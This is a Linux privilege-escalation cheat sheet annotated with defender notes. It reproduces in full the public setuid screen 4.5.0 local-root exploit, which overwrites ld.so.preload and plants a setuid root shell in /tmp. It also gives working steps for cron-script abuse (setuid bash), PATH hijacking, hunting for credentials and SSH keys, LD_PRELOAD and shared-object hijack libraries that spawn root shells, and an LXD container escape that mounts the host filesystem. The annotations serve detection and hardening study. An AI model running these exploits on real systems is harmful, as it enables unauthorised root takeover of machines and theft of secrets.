
Linux Privilege Escalation

Kernel Exploits

Enumeration

# Check Linux OS version: prints kernel release, build date and architecture.
# Defender view: a kernel behind the distribution's security updates is the
# finding here; the fix is patching (or live-patching) rather than anything
# on the host itself.
uname -a
Exploit if the version is vulnerable

Vulnerable Services (Screen)

# Check Version: the script below is written against setuid screen 4.5.0
# (see its header). A patched package removes the bug; the setuid bit is what
# makes a bug in screen worth a local root.
screen -v

Exploit Script

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
#
# Review notes (defender view): this is the public PoC kept verbatim for
# reference; it is not improved here. Artefacts it leaves that are worth
# alerting on, all visible in the lines below:
#   - a write to /etc/ld.so.preload by something other than the package
#     manager (the library's constructor unlinks it again, so the window is
#     short and the file itself is poor evidence);
#   - /tmp/libhax.so plus a setuid-root /tmp/rootshell (chown 0:0, mode 04755);
#   - a screen log file named ld.so.preload created with the cwd set to /etc.
# Mitigation is a screen build carrying the fix from the linked thread.
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
# Library source. The heredoc is written to disk verbatim, so it carries no
# annotations. Its constructor runs on load: it makes /tmp/rootshell owned by
# root and setuid, then removes the preload file (that cleanup is also why the
# on-disk evidence is short-lived).
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
# Shell payload source (again written verbatim). The setuid/setgid/seteuid/
# setegid sequence only has an effect once the binary has been made setuid
# root by the library above.
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
# The working directory is /etc so that the log file screen creates lands there.
cd /etc
umask 000 # because (author's note; no permission bits are masked off the file screen creates next)
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Cron Job Abuse

Enumeration

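# Find writable files: regular files with the world-writable bit, skipping /proc.
# -print is attached to the second branch only. Without it, find's implicit
# -print wraps the whole expression, and because -prune returns true the pruned
# /proc entry itself is listed as a false positive.
# Defender view: a world-writable script run from root's crontab is the finding;
# hardening is to keep anything cron runs as root owned by root and mode 755 or
# tighter (pspy, linked below, is the tool used to watch for such jobs).
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null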
https://github.com/DominicBreuker/pspy

Exploitation

# Add (to the root-run cron script found writable above): sets the setuid bit
# on bash, so later invocations keep root's effective uid.
# Detection: a file-integrity or auditd rule on mode changes to shells catches
# this, and a root-owned setuid bash also shows up in the "Find Setuid" search
# further down this page.
chmod u+s /bin/bash

Special Permissions

Setuid Bit

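# Find Setuid: root-owned files with the setuid bit (-perm -4000 means "this
# bit is set", other bits are ignored); ls -ldb prints each match without
# following symlinks and with escapes for odd filenames.
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Find Setgid: root-owned files with the setgid bit.
# -perm -6000 (the original) requires BOTH setuid and setgid to be set and so
# misses setgid-only files; -2000 matches setgid regardless of setuid.
# Defender view: compare the output against the package manager's file list
# and the distribution's expected setuid/setgid set; anything unexplained,
# especially in /tmp or home directories, is a finding.
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null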

Path Abuse

PATH is an environment variable that specifies the set of directories where an executable can be located.
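# Add Current Directory to Path: a leading "." makes any program in the working
# directory shadow the system one of the same name. That is the misconfiguration
# being abused; the hardening rule is never to put "." or relative entries in
# PATH, least of all for root or in environments sudo preserves.
PATH=".:${PATH}"
export PATH
# Verify Path (quoted: the unquoted original is word-split and glob-expanded
# before echo sees it, so a value with spaces or "*" would print wrong)
echo "$PATH"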

Credentials Hunting

# Enumerate config files for creds: the command searches the whole filesystem
# (outside /proc) for regular files with "config" in the name, case-insensitive;
# it is not limited to spool or mail directories.
# Defender view: files holding secrets should be mode 600 and owned by the
# service account, so an unprivileged user gets "Permission denied" here.
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
# SSH Keys in the current user's home; an unencrypted private key readable
# by others is the usual finding.
ls ~/.ssh

Shared Libraries

# Check Shared Libraries a binary is linked against. ldd(1) warns that on some
# systems it may execute the inspected program to resolve dependencies, so run
# it only on binaries you trust.
ldd /bin/ls
# Abuse LD_PRELOAD (library source follows in C, then the compile and sudo lines)
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
/* Entry point that runs when the library is loaded through LD_PRELOAD.
 * Defining _init by hand presumably clashes with the default startup objects,
 * which is why the compile line on this page passes -nostartfiles -- confirm. */
void _init() {
unsetenv("LD_PRELOAD");   /* presumably so the spawned shell does not re-preload this library */
setgid(0);                /* only succeeds if the loading process already has root privileges */
setuid(0);
system("/bin/bash");
}
# Compile the preload library (-nostartfiles because the source defines _init itself)
gcc -fPIC -shared -o root.so root.c -nostartfiles
# Run Sudo with LD_PRELOAD in the environment. sudo's default env_reset strips
# LD_PRELOAD; this step presumes the sudoers policy passes it through
# (env_keep), and removing that is the fix. Review sudoers for env_keep
# entries and for "Defaults !env_reset".
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Shared Object Hijacking

# Check Shared Libraries of the target (<bin> is a placeholder, not shell syntax)
ldd <bin>
# Check Load Location: grep PATH matches both RPATH and RUNPATH entries of the
# dynamic section. The finding is a search directory an unprivileged user can
# write to; hardening is to build without such paths or make them root-owned.
readelf -d <bin> | grep PATH
# Malicious Library (C source follows; compile step writes it into /development)
#include<stdio.h>
#include<stdlib.h>
/* Exported symbol presumably named after the function the target imports from
 * the library being replaced -- TODO confirm against the target's imports. */
void dbquery() {
printf("Malicious library loaded\n");
setuid(0);                /* only succeeds if the loading process already runs with root privileges */
system("/bin/sh -p");
}
# Compile into the directory the target searches (here /development, presumably
# the path reported by readelf above). A writable entry there is the root cause;
# a file-integrity watch on RPATH/RUNPATH directories catches the drop.
gcc root.c -fPIC -shared -o /development/libshared.so

Privileged Groups

# Check Group membership of the current user
id
# if LXD is inside the group
# Membership in the lxd group is root-equivalent: the steps below mount the
# host's / inside a privileged container. Treat the group like sudo, do not
# grant it to untrusted users, and prefer unprivileged containers.
# Import Image (a local Alpine image tarball and its rootfs, prepared beforehand)
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
# Start Privileged Container (security.privileged=true disables uid mapping)
lxc init alpine r00t -c security.privileged=true
# Mount Host root filesystem at /mnt/root inside the container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
# Start Container
lxc start r00t
# Get Shell inside the container
lxc exec r00t /bin/sh